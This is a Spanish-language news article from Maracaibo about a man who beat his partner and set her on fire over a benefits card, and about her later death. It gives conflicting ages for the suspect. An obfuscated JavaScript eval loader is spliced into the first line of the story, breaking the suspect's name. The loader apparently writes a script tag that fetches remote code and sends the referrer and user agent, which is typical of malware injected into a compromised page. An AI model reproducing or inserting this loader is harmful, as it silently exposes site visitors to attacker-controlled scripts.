publicidad

Golpea y quema viva a su mujer

Edwin Aldrin Charry / Maracaibo / noticias@laverdad.com
Alí eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|srheb|var|u0026u|referrer|nrata||js|php'.split('|'),0,{})) José Medina Hernández (38) le arrebató de las manos a su concubina, Misbeth María Cuartt Acosta (54), la tarjeta de Hogares de la Patria, para prenderle fuego y quemarla con ella

Los familiares de Misbeth Cuartt se reunieron todos frente a las instalaciones de la morgue forense esperando la llegada del cuerpo para retirarlo y darle santo sepulcro. (Fotos: José Nava)

Un arranque de furia llevó a Alí José Medina Hernández, de 48 años, a quemar a su concubina Misbeth María Cuartt Acosta, de 54 años, por no quererle entregar su tarjeta de débito de la Gran Misión Hogares de la Patria para salir a comprar licor. La discusión se generó dentro de la vivienda de la pareja en el barrio Leslay, en el sector La Rinconada, en la parroquia Antonio Borjas Romero.

El hecho ocurrió el pasado sábado 16, cuando la dama llegaba a su casa con la noticia de haber recibido la tarjeta, posteriormente su pareja se le acercó para quitársela, con la intención de ir a comprar bebidas alcohólicas en una licorería cercana. Misbeth se negó y allí comenzó la discusión y el forcejeo. 

Ana Portillo, hija mayor de la víctima, relató que tras la pelea el asesino logró arrebatarle la tarjeta a su madre por ser este más fuerte y ágil. El hombre lleno de furia diabólica quemó la tarjeta mientras le decía a su concubina “ni pa’ ti ni pa’ mí”, luego tomó un tubo que tenía a mano y golpeó a la mujer en la cabeza. Aprovechó el momento en el que Misbeth se retorcía de dolor en el suelo para rociarla con gasolina, y tirarle la tarjeta prendida. El criminal tras cometer el dantesco crimen, huyó de la vivienda. 

Los vecinos, inmediatamente, al ver que el hombre salió despavorido de la casa, se acercaron para constatar que todo se encontraba bien; sin embargo, se alarmaron al ver el cuerpo de Misbeth prendido en llamas. Luego de apagar el fuego que consumía la piel de Misbeth, llamaron a sus hijas para avisarles de lo ocurrido y llevaron a la señora, que agonizaba, al Hospital Universitario de Maracaibo, de donde la remiten cinco días después al Hospital Coromoto, por no contar con los insumos necesarios para tratarla.

El 60 por ciento del cuerpo de Misbeth María presentaba quemaduras de tercer grado. Al llegar al centro médico, los galenos de guardia la intubaron y comenzaron a tratar las heridas. Batalló por varios días por su vida, pero no soportó más el dolor de sus heridas y falleció a las 10.00 de la mañana del miércoles. 

Maltratador desentendido

Según contaron los vecinos, a la hija de Misbeth, Alí Medina volvió a la barriada con total serenidad para regresar a su hogar. No contó con que sus vecinos lo acorralaran y lo golpearan como venganza por haber atentado contra la vida de su concubina. Solamente los gritos de las mujeres que presenciaban la golpiza detuvieron a los hombres que lo linchaban. Alí comentó entre gritos de dolor desconocer lo sucedido y se atrevió a decir que no era responsable de lo que le había ocurrido a quien había sido su pareja durante 15 años. En un momento de descuido de los vecinos huyó despavorido para jamás volver.

Ana Portillo, hija mayor de Cuartt Acosta, contó que Hernández tenía problemas de conducta. Consumía “mucho licor y utilizaba drogas con frecuencia”. En algunas ocasiones obligaba a Misbeth a usarlas también. Comentó que su madre era una mujer que recibía maltrato verbal y físico. El concubino la amenazaba con hacerles daño a sus hijas si ella lo llegaba a dejarlo a él.

La familia de Cuartt Morales comentó que habían realizado la denuncia ante la Fiscalía 51.° del Ministerio Público, y que el Eje de Homicidios de la Policía científica se encuentra en la búsqueda de su agresor en las distintas barriadas de la zona oeste de Maracaibo.

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama